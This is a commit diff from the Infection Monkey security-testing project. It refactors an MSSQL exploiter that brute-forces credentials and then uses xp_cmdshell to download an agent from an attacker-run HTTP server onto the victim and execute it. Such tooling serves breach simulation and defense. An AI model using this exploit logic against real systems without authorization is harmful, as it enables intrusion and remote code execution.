p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Merge pull request #2024 from guardicore/2019-mssql-batch-cleanup 

Remove temporary "payload" file in MSSQL exploiter
This commit is contained in:
Mike Salvatore 2022-06-15 10:25:38 -04:00 committed by GitHub
parent 353594f505 4e71f4b6e4
commit ac172dc81f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 18 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -28,10 +28,6 @@ class MSSQLExploiter(HostExploiter):
QUERY_BUFFER = 0.5 QUERY_BUFFER = 0.5
SQL_DEFAULT_TCP_PORT = "1433" SQL_DEFAULT_TCP_PORT = "1433"
# Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
# Single quotes are escaped in SQL by using two of them. # Single quotes are escaped in SQL by using two of them.
# Example: 'It ain''t over ''til it''s over' # Example: 'It ain''t over ''til it''s over'
AGENT_DOWNLOAD_COMMAND = ( AGENT_DOWNLOAD_COMMAND = (
@ -43,7 +39,6 @@ class MSSQLExploiter(HostExploiter):
super().__init__() super().__init__()
self.cursor = None self.cursor = None
self.agent_http_path = None self.agent_http_path = None
self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
agent_path_on_victim = get_agent_dst_path(self.host) agent_path_on_victim = get_agent_dst_path(self.host)
@ -67,10 +62,8 @@ class MSSQLExploiter(HostExploiter):
return self.exploit_result return self.exploit_result
try: try:
self._create_temp_dir()
self._upload_agent(agent_path_on_victim) self._upload_agent(agent_path_on_victim)
self._run_agent(agent_path_on_victim) self._run_agent(agent_path_on_victim)
self._remove_temp_dir()
except Exception as e: except Exception as e:
error_message = ( error_message = (
f"An unexpected error occurred when trying " f"An unexpected error occurred when trying "
@ -145,17 +138,10 @@ class MSSQLExploiter(HostExploiter):
"Bruteforce process failed on host: {0}".format(self.host.ip_addr) "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
) )
def _create_temp_dir(self):
logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}")
mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}"
self._run_mssql_command(mkdir_command)
def _upload_agent(self, agent_path_on_victim: PureWindowsPath): def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
http_thread = self._start_agent_server(agent_path_on_victim) http_thread = self._start_agent_server(agent_path_on_victim)
self._write_download_command_to_batch_file(agent_path_on_victim) self._run_agent_download_command(agent_path_on_victim)
self.run_payload_file()
MSSQLExploiter._stop_agent_server(http_thread) MSSQLExploiter._stop_agent_server(http_thread)
@ -165,39 +151,30 @@ class MSSQLExploiter(HostExploiter):
) )
return http_thread return http_thread
def _run_agent_download_command(self, agent_path_on_victim: PureWindowsPath):
agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=str(agent_path_on_victim)
)
self._run_mssql_command(agent_download_command)
def _run_mssql_command(self, command: str):
sql_server_command = f"xp_cmdshell '{command}'"
logger.debug(f"Running command on SQL Server: {sql_server_command}")
self.cursor.execute(sql_server_command)
self.add_executed_cmd(command)
sleep(MSSQLExploiter.QUERY_BUFFER)
@staticmethod @staticmethod
def _stop_agent_server(http_thread: LockedHTTPServer): def _stop_agent_server(http_thread: LockedHTTPServer):
http_thread.stop() http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT) http_thread.join(LONG_REQUEST_TIMEOUT)
def _write_download_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath):
agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=str(agent_path_on_victim)
)
self._write_command_to_batch_file(agent_download_command)
def _write_command_to_batch_file(self, command: str):
write_to_file_command = f"<nul set /p={command}>{self.payload_file_path}"
self._run_mssql_command(write_to_file_command)
def _run_mssql_command(self, command: str):
logger.debug(f"Running command on SQL Server: {command}")
self.cursor.execute(f"xp_cmdshell '{command}'")
self.add_executed_cmd(command)
sleep(MSSQLExploiter.QUERY_BUFFER)
def run_payload_file(self):
self._run_mssql_command(str(self.payload_file_path))
def _run_agent(self, agent_path_on_victim: PureWindowsPath): def _run_agent(self, agent_path_on_victim: PureWindowsPath):
self._write_agent_launch_command_to_batch_file(agent_path_on_victim)
self.run_payload_file()
def _write_agent_launch_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath):
agent_launch_command = self._build_agent_launch_command(agent_path_on_victim) agent_launch_command = self._build_agent_launch_command(agent_path_on_victim)
self._write_command_to_batch_file(agent_launch_command) self._run_mssql_command(agent_launch_command)
def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str: def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
agent_args = build_monkey_commandline( agent_args = build_monkey_commandline(
@ -205,7 +182,3 @@ class MSSQLExploiter(HostExploiter):
) )
return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}" return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
def _remove_temp_dir(self):
self._run_mssql_command(f"del {self.payload_file_path}")
self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}")